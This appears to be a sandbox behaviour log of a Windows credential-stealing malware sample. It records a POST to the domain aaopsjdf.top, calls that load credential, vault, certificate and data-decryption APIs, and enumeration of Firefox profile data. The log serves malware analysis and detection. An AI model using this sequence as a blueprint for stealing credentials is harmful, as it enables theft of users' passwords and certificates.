| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:59:11 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close , url = aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/ |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close , url = aaopsjdf.top/sjtXcaxKxG/qW/w9/CdBdDN/a/W/44ra0Bi/DFA/ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 192 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Mutex | Create | mutex_name = D3F6CAB61E96B029AD170EEF2C2F89C2 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY |
|
2 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToLocalFileTime, address_out = 0x759de29e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToDosDateTime, address_out = 0x759ec86d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameW, address_out = 0x759fd1b6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalUnlock, address_out = 0x759ecfdf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x759d168c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x759d196e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x759d18f1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x759d1826 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x759eeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynA, address_out = 0x759e192a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x759fd556 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x759d5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x759d1700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x759d1909 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetPrivateProfileIntW, address_out = 0x759f298b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetPrivateProfileStringW, address_out = 0x759dea48 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetPrivateProfileSectionNamesW, address_out = 0x75a4a1ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x759d43e2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetDllDirectoryW, address_out = 0x75a5004f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x759ec807 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisableThreadLibraryCalls, address_out = 0x759d48e5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandle, address_out = 0x759d53ae |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalLock, address_out = 0x759ed0a7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerW, address_out = 0x758d7647 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x7774b2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyExW, address_out = 0x777546c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumValueW, address_out = 0x777548cc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x7774df7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x77787481 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x77752459 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = OleInitialize, address_out = 0x75afefd7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoTaskMemFree, address_out = 0x75b36f41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x75afeba1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = GetHGlobalFromStream, address_out = 0x75b041d5 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76370000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIA, address_out = 0x7637d250 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIA, address_out = 0x7637d11c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7638bb71 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrRChrIW, address_out = 0x763ae782 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CertOpenSystemStoreW, address_out = 0x7627c8d1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CertCloseStore, address_out = 0x7624dd10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x76275a7f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = PFXExportCertStoreEx, address_out = 0x762d1061 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CertEnumCertificatesInStore, address_out = 0x7624e33a |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x75690000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 |
|
1 | |
| Module | Load | module_name = MSVCRT.dll, base_address = 0x75e70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = memcpy, address_out = 0x75e79910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = _adjust_fdiv, address_out = 0x75f132ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = strchr, address_out = 0x75e7dbeb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = memmove, address_out = 0x75e79e5a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x75e79cee |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = atoi, address_out = 0x75e7dbe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = _vsnwprintf, address_out = 0x75e7bbce |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = _vsnprintf, address_out = 0x75e7d1a8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = memset, address_out = 0x75e79790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = _initterm, address_out = 0x75e7c151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\msvcrt.dll, function = free, address_out = 0x75e79894 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = FindFirstUrlCacheEntryW, address_out = 0x75f5978a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = DeleteUrlCacheEntryW, address_out = 0x75f79573 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = FindCloseUrlCache, address_out = 0x75f68409 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = FindNextUrlCacheEntryW, address_out = 0x75f5989c |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Module | Load | module_name = Pstorec.dll, base_address = 0x74f10000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = PStoreCreateInstance, address_out = 0x74f1526c |
|
1 | |
| COM | Create | interface = AFA0DC11-C313-11D0-831A-00C04FD5AE38, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = vaultcli.dll, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VaultOpenVault, address_out = 0x74ea26a9 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VaultCloseVault, address_out = 0x74ea2718 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VaultEnumerateItems, address_out = 0x74ea3099 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VaultGetItem, address_out = 0x74ea3242 |
|
2 | |
| Module | Get Address | module_name = Unknown module name, function = VaultFree, address_out = 0x74ea4321 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Mozilla\Firefox |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox, value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US), value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US), value_name = PathToExe, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main, value_name = PathToExe, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main, value_name = PathToExe, data = 67 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files (x86)\Mozilla Firefox, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, desired_access = FILE_READ_ATTRIBUTES |
|
1 | |
| Ini | Enumerate Sections | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, data_out = General, size = 65000 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 1 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
